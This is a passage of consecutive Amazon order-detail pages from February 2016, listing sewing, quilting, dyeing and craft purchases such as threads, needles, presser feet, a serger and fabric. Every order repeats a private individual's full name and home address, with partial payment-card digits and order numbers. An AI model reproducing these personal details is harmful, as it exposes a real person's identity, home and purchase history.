10 Yard Spools -30 Yards Total Sold by: Craft Making Shop (seller profile) $8.99 Condition: New 1 of: COATS & CLARK Dual Duty XP Heavy Thread, 125-Yard, Temple Gold Sold by: Amazon.com Services LLC $5.38 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 27, 2016 Items Ordered Price 1 of: DCWV PS-005-00082 12 by 12 Linen Solid Stack $19.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 27, 2016 Items Ordered Price 1 of: Sulky Sliver Metallic Thread for Sewing, 250 yd, Yellow Gold $6.82 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $122.17 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $122.17 Grand Total:$122.17 Billing address BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-0388074-7351455 Order Placed: February 26, 2016 Amazon.com order number: 002-0388074-7351455 Order Total: $4.28 Shipped on February 28, 2016 Items Ordered Price 1 of: Maxi-Lock Black Serger Thread, 3000 Yard Cone Sold by: ZipperStop (seller profile) $7.69 Condition: New Ships Same or Next Day from Zipperstop ZipperStop Wholesale Authorized Distributor of A & E Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $7.69 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $7.69Billing address Estimated tax to be collected: $0.00BRIAN J COADY Gift Card Amount:-$3.41 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $4.28 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-0265667-7932258 Order Placed: February 26, 2016 Amazon.com order number: 002-0265667-7932258 Seller's order number: 30133895 Order Total: $0.00 Shipped on March 1, 2016 Items Ordered Price 1 of: Gutermann SewAll Thread -#596 Sold by: Stuff4Craft (seller profile) $3.03 Condition: New Quality Brand Name Products, Ships Within 12-48 Hours With Free Order Tracking And Delivery Confirmation! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $3.03 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $2.75 Gift Card Total before tax: $5.78Billing address Estimated tax to be collected: $0.00BRIAN J COADY Gift Card Amount:-$5.78 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-9217778-4294641 Order Placed: February 26, 2016 Amazon.com order number: 002-9217778-4294641 Order Total: $9.55 Shipped on March 1, 2016 Items Ordered Price 1 of: Titanium Coated Topstitch Needles 90/14 Sold by: Quilt in a Day (seller profile) $9.44 Condition: New Since these new needles have an ultra thin coating of titanium nitride they will stay sharper longer. Topstitch needles have a larger eye and a deeper groove. Use for piecing, quilting, embroidery. Good for all thread types, including metallics. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.44 Debit Card | Last digits: 0079 Shipping & Handling: $0.11 Billing address Total before tax: $9.55 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$9.55 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-6653982-2157009 Order Placed: February 26, 2016 Amazon.com order number: 002-6653982-2157009 Order Total: $18.94 Shipped on February 29, 2016 Items Ordered Price 1 of: Maxi Lock Swirls Rainbow Swirl Serger Thread 53-M67 Sold by: ZipperStop (seller profile) $10.95 Condition: New Zipperstop Ships Same or Next Day ZipperStop Wholesale Authorized Distributor A&E 1 of: Maxi-Lock Stretch Thread 2,000 yds -#32109 White Sold by: ZipperStop (seller profile) $7.99 Condition: New Zipperstop Ships Same Day or Next Day ZipperStop Wholesale Authorized Distributor for A & E Made in USA Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $18.94 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $18.94 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$18.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-6359216-2361820 Order Placed: February 26, 2016 Amazon.com order number: 002-6359216-2361820 Order Total: $110.42 Shipped on February 26, 2016 Items Ordered 1 of: Slice 10503 Auto Retractable Box Cutter with Ceramic Blade Sold by: Amazon.com Services LLC Price $14.72 Condition: New 1 of: Soda Ash 1 Pound-Sold by: BestSource OfficeSupplies (seller profile) $7.08 Condition: New 1 of: Distinctive 1-4", 1-8" and 3-16" Large Piping/Welting Sewing Foot Package -Fits All Low Shank Singer, Brother, Babylock, Euro-Pro, Janome, Kenmore, W Sold by: Mr. Vac & Mrs. Sew (seller profile) $24.99 Condition: New Brand New! 1 of: Clover Stack 'n Stitch Thread Tower with Nancy Zieman Sold by: Amazon.com Services LLC $20.48 Condition: New 1 of: Jacquard Products Procion Four Color MX Dye Set with Soda Ash Sold by: Amazon.com Services LLC $12.34 Condition: New 1 of: 1 X Pattern Notcher Sold by: Davidsons Collection (seller profile) $5.82 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 26, 2016 Items Ordered 1 of: Janome Bobbin Holder for Free Quilting & Hand-Look Quilt Stitch for Horizontal Price $24.99 Print this page for your records. Rotary Hook Models Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $110.42 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $110.42Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$110.42 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-0891763-3331405 Order Placed: February 26, 2016 Amazon.com order number: 002-0891763-3331405 Order Total: $24.99 Shipped on February 29, 2016 Items Ordered Price 1 of: Kai 5210 8-inch Dressmaking Shears Sold by: Kai Scissors (seller profile) $24.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $24.99 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $24.99 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$24.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-0558440-4061052 Order Placed: February 26, 2016 Amazon.com order number: 002-0558440-4061052 Order Total: $12.95 Shipped on February 29, 2016 Items Ordered Price 1 of: Dmso Liquid 16oz Sold by: Countryside Pet Supply Co. (seller profile) $12.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $12.95 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $12.95 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$12.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-7457828-8019437 Order Placed: February 26, 2016 Amazon.com order number: 002-7457828-8019437 Seller's order number: 1389358 Order Total: $11.98 Shipped on February 27, 2016 Items Ordered Price 1 of: Janome Concealed Zipper Foot for Horizontal Rotary Hook Models Sold by: Fabric com (seller profile) $11.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $11.98 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $11.98Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$11.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-7241597-2414628 Order Placed: February 26, 2016 Amazon.com order number: 002-7241597-2414628 Seller's order number: 14696048 Order Total: $13.92 Shipped on February 26, 2016 Items Ordered Price 1 of: Singer Overlock Needles -Size 16 -2054-42 -10pk Sold by: SewingMachinesPlus (seller profile) $5.93 Condition: New 1 of: Singer Serger Regular Point Needles -Size 11 Sold by: SewingMachinesPlus (seller profile) $2.55 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $8.48 Debit Card | Last digits: 0079 Shipping & Handling: $5.44 Billing address Total before tax: $13.92Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$13.92 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-7141019-4683464 Order Placed: February 26, 2016 Amazon.com order number: 002-7141019-4683464 Order Total: $59.78 Shipped on February 29, 2016 Items Ordered Price 2 of: CMS Magnetics® 405 LB Super Powerful Neodymium Cup Magnet 0.7" Thick x 2.95" Diameter -1 Ct. Sold by: CMS Magnetics, Inc. (seller profile) $29.89 Condition: New Brand New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $59.78 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $59.78Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$59.78 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-6460247-5476245 Order Placed: February 26, 2016 Amazon.com order number: 002-6460247-5476245 Order Total: $589.65 Shipped on February 26, 2016 Items Ordered 1 of: SINGER 14T968DC Professional 5 5-4-3-2 Thread Capability Serger Overlock with Auto Tension Sold by: Amazon.com Services LLC Price $359.69 Condition: Used -Very Good Item may come repackaged. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Delivery Shipped on February 26, 2016 Items Ordered 1 of: Felling Foot Sold by: Metropolitans Warehouse (seller profile) Price $13.99 Condition: New 1 of: Reliable 1500FR Round Knife Cloth Cutting Machine, 4-Inch Sold by: Amazon.com Services LLC $179.00 Condition: New Print this page for your records. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Delivery Payment Method: Debit Card | Last digits: 0079 Item(s) Subtotal: $552.68 Shipping & Handling: $36.97 ---- Billing address Brian Joseph Coady 1454 Monroe St. NW Total before tax: $589.65 Estimated tax to be collected: $0.00 ---- Washington, DC 20010 Grand Total:$589.65 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-5669021-6113039 Order Placed: February 26, 2016 Amazon.com order number: 002-5669021-6113039 Order Total: $154.44 Shipped on February 27, 2016 Items Ordered 1 of: Janome Purple Tip Sewing Machine Needles Sold by: SewVacDirect (seller profile) | Product question? Ask Seller Price $9.99 Condition: New 1 of: Granger's Performance Wash Cleaner Sold by: Amazon.com Services LLC $9.00 Condition: New 1 of: Janome Pintucking Feet for Horizontal Rotary Hook Models Sold by: Amazon.com Services LLC $19.99 Condition: New 1 of: Janome Binder Foot for Horizontal Rotary Hook Models Sold by: Amazon.com Services LLC $24.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 26, 2016 Items Ordered 1 of: Granger's Clothing Repel Sold by: Amazon.com Services LLC Price $12.00 Condition: New 1 of: Janome Needle Set for Memory Craft Emb Machines/ Horizontal Rotary Hook Models Sold by: SewVacDirect (seller profile) | Product question? Ask Seller $8.49 Condition: New Brand New 1 of: Janome Top-Load Sewing Machine Quilting Attachment Set $69.99 Print this page for your records. Sold by: Metropolitans Warehouse (seller profile) Condition: New Brand New Factory Sealed. We Are An Authorized Online Janome Dealer. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $154.44 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $154.44 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$154.44 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-2948979-2724248 Order Placed: February 26, 2016 Amazon.com order number: 002-2948979-2724248 Order Total: $83.26 Shipped on February 26, 2016 Items Ordered 1 of: Distinctive Adjustable Zipper Piping Cording Sewing Machine Presser Foot -Fits All Low Shank Singer, Brother, Babylock, Euro-Pro, Janome, Kenmore, Wh Sold by: Mr. Vac & Mrs. Sew (seller profile) Price $7.99 Condition: New Brand New 1 of: Fusible Fleece by Pellon: 45"x60" Sold by: World Weidner -Machine Embroidery Supplies (seller profile) $12.49 Condition: New 1 of: Gingher 7.5 Inch Pinking Shears (01-005272) Sold by: Amazon.com Services LLC $29.06 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Shipped on February 26, 2016 Items Ordered 1 of: Singer Titanium Universal Regular Point Machine Needles for Woven Fabric, Assorted Sizes, 10-Pack Sold by: Amazon.com Services LLC Price $5.99 Condition: New 1 of: Dritz Machine Needle Inserter and Threader Sold by: Amazon.com Services LLC $5.18 Condition: New 2 of: Universal Regular Point Overlock Needles-5/Pkg Sold by: Amazon.com Services LLC $7.28 Condition: New Print this page for your records. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Shipped on February 26, 2016 Items Ordered Price 1 of: Janome Sewing Machine Needle Denim Size 16 $7.99 Sold by: World Weidner -Machine Embroidery Supplies (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $83.26 Debit Card | Last digits: 0079 Shipping & Handling: $31.92 Free Shipping :-$31.92 Billing address Brian Joseph Coady Total before tax: $83.261454 Monroe St. NW Estimated tax to be collected: $0.00Washington, DC 20010 United States Grand Total:$83.26 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-8183679-1786631 Order Placed: February 16, 2016 Amazon.com order number: 115-8183679-1786631 Order Total: $6.47 Shipped on February 17, 2016 Items Ordered Price 1 of: Solid Ties / Multiful color Formal Tie by boxed-gift, Light Brown Sold by: Boxed-Gifts (seller profile) $1.49 Condition: New Ships from NJ, USA. 1-3 Day Expedited Shipping also available. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.49 Visa | Last digits: 0047 Shipping & Handling: $4.98 Billing address Total before tax: $6.47 Brian J Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$6.47 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-6952937-2412224 Order Placed: February 16, 2016 Amazon.com order number: 115-6952937-2412224 Order Total: $271.84 Shipped on February 17, 2016 Items Ordered 1 of: Doublju Mens Jersey Polo with Contrast Placket GREEN (US-M) Sold by: Doublju company (seller profile) Price $9.99 Condition: New 1 of: Aleenes fabric stiffener &draping liquid Sold by: Amazon.com Services LLC $6.58 Condition: New 1 of: Magnum Magnetics-Corporation ProMAG Round Ceramic Magnets, 3/4" Sold by: Amazon.com Services LLC $8.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 17, 2016 Items Ordered 1 of: Sizzix 660425 Big Shot Cutting/Embossing Machine with Extended Multipurpose Platform, White/Gray Sold by: Amazon.com Services LLC Price $83.18 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Print this page for your records. Shipped on February 17, 2016 Items Ordered Price 1 of: Sulky Of America 0.004mm Invisible Polyester Thread, 2200 yd, Smoke $11.09 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 16, 2016 Items Ordered Price 1 of: Doublju Mens Jersey Polo with Contrast Placket BLACK (US-M) $9.99 Sold by: Doublju company (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 17, 2016 Items Ordered Price 1 of: Simplicity Deluxe Felting Machine $142.52 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Grand Total:$271.84 Payment information Payment Method: Visa | Last digits: 0047 Item(s) Subtotal: $271.84 Shipping & Handling: $0.00 Billing address Brian J Coady 1454 MONROE ST NW Total before tax: $271.84 Estimated tax to be collected: $0.00 WASHINGTON, DC 20010-3139 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-1875075-7885035 Order Placed: February 16, 2016 Amazon.com order number: 115-1875075-7885035 Order Total: $12.88 Shipped on February 17, 2016 Items Ordered Price 1 of: KINGSO 21PCS Cotton Linen Fabric Bundles Quilting Sewing Patchwork DIY Craft $12.88 9.84*8.66 inch Mixed Color Sold by: WonderU (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $12.88 Visa | Last digits: 0047 Shipping & Handling: $0.00 Billing address Total before tax: $12.88Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.88 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-1272581-5971410 Order Placed: February 16, 2016 Amazon.com order number: 115-1272581-5971410 Order Total: $12.09 Shipped on February 17, 2016 Items Ordered 1 of: Sizzix Framelits Die Set 8PK -Circles Sold by: Amazon.com Services LLC Price $12.09 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $12.09 Visa | Last digits: 0047 Shipping & Handling: $0.00 Billing address Total before tax: $12.09 Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.09 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-0499111-9583465 Order Placed: February 16, 2016 Amazon.com order number: 115-0499111-9583465 Seller's order number: 30121365 Order Total: $4.57 Shipped on February 18, 2016 Items Ordered Price 1 of: COATS & CLARK Dual Duty Plus Denim Thread, 125-Yard, Denim Blue Sold by: Stuff4Craft (seller profile) $1.82 Condition: New Quality Brand Name Products, Ships Within 12-48 Hours With Free Order Tracking And Delivery Confirmation! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1.82 Visa | Last digits: 0047 Shipping & Handling: $2.75 Billing address Total before tax: $4.57Brian J Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$4.57 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-6909535-2103465 Order Placed: February 15, 2016 Amazon.com order number: 110-6909535-2103465 Seller's order number: 10976801 Order Total: $12.88 Shipped on February 16, 2016 Items Ordered Price 1 of: Jacquard Reactive Dye Fixative 8 oz. Sold by: CreateForLess (seller profile) $6.89 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.89 Debit Card | Last digits: 0079 Shipping & Handling: $5.99 Billing address Total before tax: $12.88Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$12.88 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-3298834-3764210 Order Placed: February 15, 2016 Amazon.com order number: 110-3298834-3764210 Order Total: $13.99 Shipped on February 16, 2016 Items Ordered Price 1 of: Sale 25 Assorted 9" & 10" Zippers -YKK # 3 Skirt and Dress Nylon Coil -Closed $13.99 End (25 Zippers/pack) Sold by: ZipperStop (seller profile) Condition: New ~BONUS~ 4 DYED TO MATCH YKK NEON ZIPPERS~ ALSO WE ACCEPT REQUEST FOR COLORS~ STOCK OVER 500 YKK COLORS~Send us a message with your color choices. NO DUPLICATE COLORS from ZIPPERSTOP ZipperStop Wholesale Authorized Distributor YKK® 25 Assorted 9" & 10" Zippers-MADE IN USA -ZIPPERSTOP ACCEPTS REQUESTS FOR YKK COLORS~Send us a message or call us! Happy to help! 500 IN stock~ YKK # 3 Skirt and Dress Nylon Coil -Closed End (25 Zippers/pack)..ZIPPERSTOP accepts requests for colors~OVER 500 YKK COLORS IN STOCK~. DO NOT BE FOOLED BY OTHER SELLERS, WHO SEND YKK COUNTERFEIT ZIPPERS, AND LIST THEM AS 100% YKK Zipperstop stocks over 500 YKK Colors A mix of 9 & 10 inch zippers. MADE IN USA by YKK You will get an assortment of the hottest colors of the season. Strong yet lightweight zipper for slacks, skirts and dresses. Don't be fooled by others who are selling YKK zippers. Zipperstop sends 100% YKk Zippers manufactured by YKK in USA. No counterfeits! No duplicate colors. Color may vary on your monitor. BUY AS MANY AS YOU NEED. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $13.99 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $13.99 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$13.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #110-0084880-4582653 Order Placed: February 15, 2016 Amazon.com order number: 110-0084880-4582653 Order Total: $63.04 Shipped on February 16, 2016 Items Ordered 1 of: Martha Stewart Crafts Fringe Scissors Sold by: Amazon.com Services LLC Price $6.44 Condition: Used -Good Small cosmetic imperfection on top, front or sides of item (less than 1"x1"). Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 16, 2016 Items Ordered 1 of: Miracle-Gro Indoor Plant Food, 48-Spikes Sold by: Amazon.com Services LLC Price $2.00 Condition: New 1 of: Deco Art Jacquard Procion Mx Dye, 2/3-Ounce, Medium Blue Sold by: Amazon.com Services LLC $6.46 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Items Ordered Price 1 of: THREAD SPOOL HUGGERS, 'PEELS ...Keep Thread Tails Under Control' (12 $9.99 Pieces). Prevents Thread Spools From Unwinding While in Storage or on Thread Rack Sold by: Smartneedle.inc (seller profile) Condition: New 1 of: Red Devil 0310 16 Pack Steel Wool, 0000 Super Fine $10.08 Sold by: Amazon.com Services LLC Condition: New 1 of: Janome Pintucking Cord Guides for Horizontal Rotary Hook Models $19.99 Sold by: bettergosew (seller profile) Condition: New 1 of: Jacquard Products Jacquard Procion MX Dye, 2/3-Ounce, Ice Blue $8.08 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $63.04 Visa | Last digits: 0047 Shipping & Handling: $0.00 Billing address Total before tax: $63.04 Brian J Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$63.04 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-7787201-4397069 Order Placed: February 7, 2016 Amazon.com order number: 116-7787201-4397069 Order Total: $104.84 Shipped on February 9, 2016 Items Ordered Price 1 of: Leaded Weight Drapery Tape 1/8" Wide 72 Yards-Sold by: Amazon.com Services LLC $46.89 Condition: New 1 of: Gingher 6 Inch Knife Edge Applique Scissors Sold by: Amazon.com Services LLC $19.98 Condition: New 1 of: Aituo 1 Pair Pu Coated Cut Resistant Gloves Safety Protective En388 Cut Level 5 Protection, Anti-slash Kitchen or Industry Cut Safe Work Gloves-X-larg Sold by: Aituoo (seller profile) $9.99 Condition: New 1 of: Fellowes 7-Outlet Metal Power Strip, 12-Foot Cord (99089) Sold by: Amazon.com Services LLC $18.99 Condition: New 1 of: LENOX Gold 20350-GOLD5C Titanium Edge Utility Knife Blade -5 Pack Sold by: Amazon.com Services LLC $2.56 Condition: New 1 of: Dritz 8920 Drapery Lead Square Covered Weights, 1-Inch, 4-Pack Sold by: Amazon.com Services LLC $6.43 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $104.84 MasterCard | Last digits: 5262 Shipping & Handling: $0.00 Billing address Total before tax: $104.84 Brian Joseph Coady 1454 Monroe St. NW Washington, DC 20010 United States Grand Total:$104.84 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #116-1370632-4379462 Order Placed: February 7, 2016 Amazon.com order number: 116-1370632-4379462 Order Total: $30.80 Shipped on February 8, 2016 Items Ordered Price 3 of: Light-weight Natural Flaxen Linen Fabric By the Yard Sold by: FashionFabricsClub (seller profile) $7.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $23.85 MasterCard | Last digits: 5262 Shipping & Handling: $6.95 Billing address Total before tax: $30.80 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$30.80 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-9641168-8729057 Order Placed: February 3, 2016 Amazon.com order number: 116-9641168-8729057 Order Total: $48.00 Shipped on February 4, 2016 Items Ordered Price 1 of: Cotton Muslin Fabric By The 25 Yards Bolt, 60-Inch Wide, Natural Color. Sold by: THE FABRIC EXCHANGE -Wholesale Direct! (seller profile) $35.01 Condition: New Buy authentic, check our quality! Free sample swatches available, [email protected] Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $35.01 Debit Card | Last digits: 0079 Shipping & Handling: $12.99 Billing address Total before tax: $48.00 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$48.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #116-5844598-0751432 Order Placed: February 3, 2016 Amazon.com order number: 116-5844598-0751432 Order Total: $6.99 Shipped on February 4, 2016 Items Ordered 1 of: 3" STAINLESS STEEL RULER HEM CLIPS -SET OF 6 Sold by: DBROTH (seller profile) Price $6.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.99 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $6.99 Brian Joseph Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$6.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order 